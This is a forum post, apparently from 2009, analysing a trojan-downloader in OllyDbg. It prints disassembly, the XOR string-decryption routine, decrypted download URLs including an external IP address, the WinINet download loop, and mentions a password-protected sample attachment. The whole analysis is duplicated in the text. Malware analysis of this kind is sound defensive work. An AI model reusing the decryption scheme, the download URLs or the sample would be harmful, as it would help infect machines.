one trojan Analysis(partly)
Hello everyone.Today I want to share one of my virus-analysis to you.
This is a common trojan-downloader in our internet.And it has lots of junk codes.
I didn't analysis all of it,because the downloaderfile is missing.
(about the downloaderfile, we may ask the trojan author)
another thing, my English is poor.so I'm sorry to trouble you to reading this article.
(Maybe, you can PM me to point out where I should modify and improve)
OK, Let's start:
First load it with Ollydbg, we will see this:
00403CA6 >/$ 55 push ebp
00403CA7 |. 89E5 mov ebp, esp
00403CA9 |. 83EC 28 sub esp, 28
00403CAC |. 81EC 3C080000 sub esp, 83C
00403CB2 |. 89E3 mov ebx, esp
00403CB4 |. 8925 A23C4000 mov dword ptr [403CA2], esp
00403CBA |. A1 3B504000 mov eax, dword ptr [<&KERNEL32.LoadLibraryA>]
00403CBF |. 8943 41 mov dword ptr [ebx+41], eax
00403CC2 |. A1 37504000 mov eax, dword ptr [<&KERNEL32.GetProcAddress>]
00403CC7 |. 8983 D9070000 mov dword ptr [ebx+7D9], eax
00403CCD |. E8 98D6FFFF call 0040136A
look at the call on 00403CCD, this call load three DLLs(kernel32.dll,user32.dll,wininit.dll)
and get some API's address.wininit.dll is the most important,because it showed the
programme may downloader file from internet.Then, the init-work is over,and the programme
need the web site address or the IP to downloader file.we continue to seek...
After a VirtualAlloc, we can see this:
00403D33 |. 8983 70040000 mov dword ptr [ebx+470], eax
00403D39 |. 8B83 70040000 mov eax, dword ptr [ebx+470]
00403D3F |. 8983 1B080000 mov dword ptr [ebx+81B], eax
00403D45 |. 83EC 04 sub esp, 4
00403D48 |. B4 72 mov ah, 72
00403D4A |. 8D83 00020000 lea eax, dword ptr [ebx+200]
00403D50 |. 890424 mov dword ptr [esp], eax
00403D53 |. E8 F6EBFFFF call 0040294E
the call on 00403D53 is an important function.It first get the programme name(use GetCommandLineA),
use API CreateFileA to open file.It tries to find a sign to located the web site string which it needs.
First, it tries to find "AAAA", but unfortunately, there are a few "AAAA" in this file, not only one.
So, once found, the programme need to check the dword after "AAAA". If it's "XCRS", then the destination
address is found.
00402CC2 |> \8BB3 66060000 |mov esi, dword ptr [ebx+666]
00402CC8 |. 813E 41414141 |cmp dword ptr [esi], 41414141 // here to find the sign "AAAA"
00402CCE |. 74 02 |je short 00402CD2 // if matched, continue checking the next sign
00402CD0 |. EB 50 |jmp short 00402D22 // otherwise, go to next loop
00402CD2 |> 8B83 66060000 |mov eax, dword ptr [ebx+666]
00402CD8 |. 8983 ED060000 |mov dword ptr [ebx+6ED], eax
00402CDE |. 8383 ED060000>|add dword ptr [ebx+6ED], 4
00402CE5 |. 8B83 ED060000 |mov eax, dword ptr [ebx+6ED]
00402CEB |. 8943 4E |mov dword ptr [ebx+4E], eax
00402CEE |. 8B73 4E |mov esi, dword ptr [ebx+4E]
00402CF1 |. 813E 58435253 |cmp dword ptr [esi], 53524358 // here to find the sign "XCRS"
00402CF7 |. 74 02 |je short 00402CFB
00402CF9 |. EB 27 |jmp short 00402D22
00402CFB |> 8B83 66060000 |mov eax, dword ptr [ebx+666] // here, the destination address is found
00402D01 |. 8983 59050000 |mov dword ptr [ebx+559], eax
00402D07 |. 80F1 BE |xor cl, 0BE
00402D0A |. 8383 59050000>|add dword ptr [ebx+559], 8 // add address 8 byte to skip the sign
00402D11 |. 8B83 59050000 |mov eax, dword ptr [ebx+559]
00402D17 |. 8983 66060000 |mov dword ptr [ebx+666], eax
00402D1D |. 80E6 63 |and dh, 63
00402D20 |. EB 1B |jmp short 00402D3D
And here, it check the destination address.If it's NULL, then function return 0.otherwise, continue to
decrypt the data.
00402D3D |> \8B45 08 mov eax, dword ptr [ebp+8]
00402D40 |. 8983 6A060000 mov dword ptr [ebx+66A], eax
00402D46 |. 8B83 F8010000 mov eax, dword ptr [ebx+1F8]
00402D4C |. 3983 66060000 cmp dword ptr [ebx+666], eax // check the destination address
00402D52 |. 7C 05 jl short 00402D59
00402D54 |. E9 09010000 jmp 00402E62 // if it's NULL, function over
The decrypting call is on 00402E02. Although it has many junk code, the actual decrypt algorithm is
very easy:
int nTemp = 0x6F;
for (int i = 0; i < SIZEOFDATA; i++)
{
_asm
{
xor dest_addr[i], nTemp
}
nTemp += 0x93;
}
At last, we will get the string like this "http://207.226.177.100/dl?w=1077&a=0", then, function
return 1.Actually, if the function return 0, there is another string "http://192.168.1.3/php/file.exe".
We will know that it can spread in LAN.Then the most important thing is to download file.The call on
00403EFE is for this.the function first check the API address to see if it's legal.
00402F05 /$ 55 push ebp
00402F06 |. 89E5 mov ebp, esp
00402F08 |. 81EC B0000000 sub esp, 0B0
00402F0E |. 8B1D A23C4000 mov ebx, dword ptr [403CA2]
00402F14 |. 83BB 09040000>cmp dword ptr [ebx+409], 0 // RtlAllocateHeap
00402F1B |. 74 6F je short 00402F8C // if the API address is invalid, function over
00402F1D |. 80C6 54 add dh, 54
00402F20 |. 83BB FF070000>cmp dword ptr [ebx+7FF], 0 // InternetCrackUrlA
00402F27 |. 74 63 je short 00402F8C
00402F29 |. 83BB 40050000>cmp dword ptr [ebx+540], 0 // InternetOpenA
00402F30 |. 74 5A je short 00402F8C
00402F32 |. 83BB 98030000>cmp dword ptr [ebx+398], 0 // InternetConnectA
00402F39 |. 74 51 je short 00402F8C
00402F3B |. 83BB 80040000>cmp dword ptr [ebx+480], 0 // HttpOpenRequestA
00402F42 |. 74 48 je short 00402F8C
00402F44 |. 80C5 12 add ch, 12
00402F47 |. 83BB 28040000>cmp dword ptr [ebx+428], 0 // GetProcessHeap
00402F4E |. 74 3C je short 00402F8C
00402F50 |. 83BB BB040000>cmp dword ptr [ebx+4BB], 0 // HttpSendRequestA
00402F57 |. 74 33 je short 00402F8C
00402F59 |. 83BB 78040000>cmp dword ptr [ebx+478], 0 // HttpQueryInfoA
00402F60 |. 74 2A je short 00402F8C
00402F62 |. B1 6A mov cl, 6A
00402F64 |. 83BB 17060000>cmp dword ptr [ebx+617], 0 // InternetQueryDataAvailable
00402F6B |. 74 1F je short 00402F8C
00402F6D |. B2 5E mov dl, 5E
00402F6F |. 83BB 38050000>cmp dword ptr [ebx+538], 0 // Sleep
00402F76 |. 74 14 je short 00402F8C
00402F78 |. 83BB 01070000>cmp dword ptr [ebx+701], 0 // InternetReadFile
00402F7F |. 74 0B je short 00402F8C
00402F81 |. 83BB F4010000>cmp dword ptr [ebx+1F4], 0 // InternetCloseHandle
00402F88 |. 74 02 je short 00402F8C
00402F8A |. /EB 0A jmp short 00402F96
00402F8C |> |B8 00000000 mov eax, 0 // API address invalid, function over and return 0
00402F91 |. |E9 E7070000 jmp 0040377D
Then, debug with OD, we will see the connection to 207.226.177.100(or 192.168.1.3) with port 50.
The programme use InternetQueryDataAvailable and InternetReadFile as a loop to download file to memory.
Well, it seems that the author has canceled the download file.I can't get the correct file when I analysising.
Instead, it is like this:
0009D4E8 3C 68 74 6D 6C 3E 0D 0A 3C 68 65 61 64 3E 3C 74 ..
0009D4F8 69 74 6C 65 3E 34 30 34 20 4E 6F 74 20 46 6F 75 itle>404 Not Fou
0009D508 6E 64 3C 2F 74 69 74 6C 65 3E 3C 2F 68 65 61 64 nd 0009D518 3E 0D 0A 3C 62 6F 64 79 20 62 67 63 6F 6C 6F 72 >..
0009D528 3D 22 77 68 69 74 65 22 3E 0D 0A 3C 63 65 6E 74 ="white">..
0009D538 65 72 3E 3C 68 31 3E 34 30 34 20 4E 6F 74 20 46 er>
0009D568 6E 67 69 6E 78 2F 30 2E 35 2E 33 36 3C 2F 63 65 nginx/0.5.36 0009D578 6E 74 65 72 3E 0D 0A 3C 2F 62 6F 64 79 3E 0D 0A nter>....
0009D588 3C 2F 68 74 6D 6C 3E
Later, we will see ,it should be a PE file which is encryptioned.Look at this:
00403F37 |. 8BB3 A0040000 mov esi, dword ptr [ebx+4A0]
00403F3D |. 813E 58435253 cmp dword ptr [esi], 53524358 // compare with "XCRS"
00403F43 |. 74 02 je short 00403F47
the PE file(encryptioned) should begin with "XCRS", if so, decrypting is begin. if not,
It needn't be decrypted(Maybe, this means the file is got from LAN).The decrypting is as same as before.
The call is on 00403FA8.
At last, the call on 00404000 check the file decrypted.
From here, we will know the file is a PE file:
0040270C |> \8B45 08 mov eax, dword ptr [ebp+8]
0040270F |. 8983 0F060000 mov dword ptr [ebx+60F], eax
00402715 |. 8BB3 0F060000 mov esi, dword ptr [ebx+60F]
0040271B |. 83C6 00 add esi, 0
0040271E |. 66:813E 4D5A cmp word ptr [esi], 5A4D // compare the file head with "MZ"
00402723 |. 75 02 jnz short 00402727
but I didn't analysis it over,because I don't have the
correct file.It's too hard to construct one.If you are interested in it, you can try :)
A summary:
1.This trojan make many junk code.
2.Dynamic load the DLL and API which is needed.
3.Download file from designated site and it can spread in LAN.
4.many important data is encryptioned, and when needed, the programme decrypting them.
5.The whole process has many check,if one failed, and the programme may exit.
--------------------------------------------------------------------------------------------------
Warning: This is a trojan, don't run or debug it in your true-machine, use virtual-machine.
the RAR's password is "virus"
This is a common trojan-downloader in our internet.And it has lots of junk codes.
I didn't analysis all of it,because the downloaderfile is missing.
(about the downloaderfile, we may ask the trojan author)
another thing, my English is poor.so I'm sorry to trouble you to reading this article.
(Maybe, you can PM me to point out where I should modify and improve)
OK, Let's start:
First load it with Ollydbg, we will see this:
00403CA6 >/$ 55 push ebp
00403CA7 |. 89E5 mov ebp, esp
00403CA9 |. 83EC 28 sub esp, 28
00403CAC |. 81EC 3C080000 sub esp, 83C
00403CB2 |. 89E3 mov ebx, esp
00403CB4 |. 8925 A23C4000 mov dword ptr [403CA2], esp
00403CBA |. A1 3B504000 mov eax, dword ptr [<&KERNEL32.LoadLibraryA>]
00403CBF |. 8943 41 mov dword ptr [ebx+41], eax
00403CC2 |. A1 37504000 mov eax, dword ptr [<&KERNEL32.GetProcAddress>]
00403CC7 |. 8983 D9070000 mov dword ptr [ebx+7D9], eax
00403CCD |. E8 98D6FFFF call 0040136A
look at the call on 00403CCD, this call load three DLLs(kernel32.dll,user32.dll,wininit.dll)
and get some API's address.wininit.dll is the most important,because it showed the
programme may downloader file from internet.Then, the init-work is over,and the programme
need the web site address or the IP to downloader file.we continue to seek...
After a VirtualAlloc, we can see this:
00403D33 |. 8983 70040000 mov dword ptr [ebx+470], eax
00403D39 |. 8B83 70040000 mov eax, dword ptr [ebx+470]
00403D3F |. 8983 1B080000 mov dword ptr [ebx+81B], eax
00403D45 |. 83EC 04 sub esp, 4
00403D48 |. B4 72 mov ah, 72
00403D4A |. 8D83 00020000 lea eax, dword ptr [ebx+200]
00403D50 |. 890424 mov dword ptr [esp], eax
00403D53 |. E8 F6EBFFFF call 0040294E
the call on 00403D53 is an important function.It first get the programme name(use GetCommandLineA),
use API CreateFileA to open file.It tries to find a sign to located the web site string which it needs.
First, it tries to find "AAAA", but unfortunately, there are a few "AAAA" in this file, not only one.
So, once found, the programme need to check the dword after "AAAA". If it's "XCRS", then the destination
address is found.
00402CC2 |> \8BB3 66060000 |mov esi, dword ptr [ebx+666]
00402CC8 |. 813E 41414141 |cmp dword ptr [esi], 41414141 // here to find the sign "AAAA"
00402CCE |. 74 02 |je short 00402CD2 // if matched, continue checking the next sign
00402CD0 |. EB 50 |jmp short 00402D22 // otherwise, go to next loop
00402CD2 |> 8B83 66060000 |mov eax, dword ptr [ebx+666]
00402CD8 |. 8983 ED060000 |mov dword ptr [ebx+6ED], eax
00402CDE |. 8383 ED060000>|add dword ptr [ebx+6ED], 4
00402CE5 |. 8B83 ED060000 |mov eax, dword ptr [ebx+6ED]
00402CEB |. 8943 4E |mov dword ptr [ebx+4E], eax
00402CEE |. 8B73 4E |mov esi, dword ptr [ebx+4E]
00402CF1 |. 813E 58435253 |cmp dword ptr [esi], 53524358 // here to find the sign "XCRS"
00402CF7 |. 74 02 |je short 00402CFB
00402CF9 |. EB 27 |jmp short 00402D22
00402CFB |> 8B83 66060000 |mov eax, dword ptr [ebx+666] // here, the destination address is found
00402D01 |. 8983 59050000 |mov dword ptr [ebx+559], eax
00402D07 |. 80F1 BE |xor cl, 0BE
00402D0A |. 8383 59050000>|add dword ptr [ebx+559], 8 // add address 8 byte to skip the sign
00402D11 |. 8B83 59050000 |mov eax, dword ptr [ebx+559]
00402D17 |. 8983 66060000 |mov dword ptr [ebx+666], eax
00402D1D |. 80E6 63 |and dh, 63
00402D20 |. EB 1B |jmp short 00402D3D
And here, it check the destination address.If it's NULL, then function return 0.otherwise, continue to
decrypt the data.
00402D3D |> \8B45 08 mov eax, dword ptr [ebp+8]
00402D40 |. 8983 6A060000 mov dword ptr [ebx+66A], eax
00402D46 |. 8B83 F8010000 mov eax, dword ptr [ebx+1F8]
00402D4C |. 3983 66060000 cmp dword ptr [ebx+666], eax // check the destination address
00402D52 |. 7C 05 jl short 00402D59
00402D54 |. E9 09010000 jmp 00402E62 // if it's NULL, function over
The decrypting call is on 00402E02. Although it has many junk code, the actual decrypt algorithm is
very easy:
int nTemp = 0x6F;
for (int i = 0; i < SIZEOFDATA; i++)
{
_asm
{
xor dest_addr[i], nTemp
}
nTemp += 0x93;
}
At last, we will get the string like this "http://207.226.177.100/dl?w=1077&a=0", then, function
return 1.Actually, if the function return 0, there is another string "http://192.168.1.3/php/file.exe".
We will know that it can spread in LAN.Then the most important thing is to download file.The call on
00403EFE is for this.the function first check the API address to see if it's legal.
00402F05 /$ 55 push ebp
00402F06 |. 89E5 mov ebp, esp
00402F08 |. 81EC B0000000 sub esp, 0B0
00402F0E |. 8B1D A23C4000 mov ebx, dword ptr [403CA2]
00402F14 |. 83BB 09040000>cmp dword ptr [ebx+409], 0 // RtlAllocateHeap
00402F1B |. 74 6F je short 00402F8C // if the API address is invalid, function over
00402F1D |. 80C6 54 add dh, 54
00402F20 |. 83BB FF070000>cmp dword ptr [ebx+7FF], 0 // InternetCrackUrlA
00402F27 |. 74 63 je short 00402F8C
00402F29 |. 83BB 40050000>cmp dword ptr [ebx+540], 0 // InternetOpenA
00402F30 |. 74 5A je short 00402F8C
00402F32 |. 83BB 98030000>cmp dword ptr [ebx+398], 0 // InternetConnectA
00402F39 |. 74 51 je short 00402F8C
00402F3B |. 83BB 80040000>cmp dword ptr [ebx+480], 0 // HttpOpenRequestA
00402F42 |. 74 48 je short 00402F8C
00402F44 |. 80C5 12 add ch, 12
00402F47 |. 83BB 28040000>cmp dword ptr [ebx+428], 0 // GetProcessHeap
00402F4E |. 74 3C je short 00402F8C
00402F50 |. 83BB BB040000>cmp dword ptr [ebx+4BB], 0 // HttpSendRequestA
00402F57 |. 74 33 je short 00402F8C
00402F59 |. 83BB 78040000>cmp dword ptr [ebx+478], 0 // HttpQueryInfoA
00402F60 |. 74 2A je short 00402F8C
00402F62 |. B1 6A mov cl, 6A
00402F64 |. 83BB 17060000>cmp dword ptr [ebx+617], 0 // InternetQueryDataAvailable
00402F6B |. 74 1F je short 00402F8C
00402F6D |. B2 5E mov dl, 5E
00402F6F |. 83BB 38050000>cmp dword ptr [ebx+538], 0 // Sleep
00402F76 |. 74 14 je short 00402F8C
00402F78 |. 83BB 01070000>cmp dword ptr [ebx+701], 0 // InternetReadFile
00402F7F |. 74 0B je short 00402F8C
00402F81 |. 83BB F4010000>cmp dword ptr [ebx+1F4], 0 // InternetCloseHandle
00402F88 |. 74 02 je short 00402F8C
00402F8A |. /EB 0A jmp short 00402F96
00402F8C |> |B8 00000000 mov eax, 0 // API address invalid, function over and return 0
00402F91 |. |E9 E7070000 jmp 0040377D
Then, debug with OD, we will see the connection to 207.226.177.100(or 192.168.1.3) with port 50.
The programme use InternetQueryDataAvailable and InternetReadFile as a loop to download file to memory.
Well, it seems that the author has canceled the download file.I can't get the correct file when I analysising.
Instead, it is like this:
0009D4E8 3C 68 74 6D 6C 3E 0D 0A 3C 68 65 61 64 3E 3C 74 ..
0009D4F8 69 74 6C 65 3E 34 30 34 20 4E 6F 74 20 46 6F 75 itle>404 Not Fou
0009D508 6E 64 3C 2F 74 69 74 6C 65 3E 3C 2F 68 65 61 64 nd 0009D518 3E 0D 0A 3C 62 6F 64 79 20 62 67 63 6F 6C 6F 72 >..
0009D528 3D 22 77 68 69 74 65 22 3E 0D 0A 3C 63 65 6E 74 ="white">..
0009D538 65 72 3E 3C 68 31 3E 34 30 34 20 4E 6F 74 20 46 er>
404 Not F 0009D548 6F 75 6E 64 3C 2F 68 31 3E 3C 2F 63 65 6E 74 65 ound
..Later, we will see ,it should be a PE file which is encryptioned.Look at this:
00403F37 |. 8BB3 A0040000 mov esi, dword ptr [ebx+4A0]
00403F3D |. 813E 58435253 cmp dword ptr [esi], 53524358 // compare with "XCRS"
00403F43 |. 74 02 je short 00403F47
the PE file(encryptioned) should begin with "XCRS", if so, decrypting is begin. if not,
It needn't be decrypted(Maybe, this means the file is got from LAN).The decrypting is as same as before.
The call is on 00403FA8.
At last, the call on 00404000 check the file decrypted.
From here, we will know the file is a PE file:
0040270C |> \8B45 08 mov eax, dword ptr [ebp+8]
0040270F |. 8983 0F060000 mov dword ptr [ebx+60F], eax
00402715 |. 8BB3 0F060000 mov esi, dword ptr [ebx+60F]
0040271B |. 83C6 00 add esi, 0
0040271E |. 66:813E 4D5A cmp word ptr [esi], 5A4D // compare the file head with "MZ"
00402723 |. 75 02 jnz short 00402727
but I didn't analysis it over,because I don't have the
correct file.It's too hard to construct one.If you are interested in it, you can try :)
A summary:
1.This trojan make many junk code.
2.Dynamic load the DLL and API which is needed.
3.Download file from designated site and it can spread in LAN.
4.many important data is encryptioned, and when needed, the programme decrypting them.
5.The whole process has many check,if one failed, and the programme may exit.
--------------------------------------------------------------------------------------------------
Warning: This is a trojan, don't run or debug it in your true-machine, use virtual-machine.
the RAR's password is "virus"
- Attachments:
© 2009 Created by pdp on Ning. Create a Ning Network!
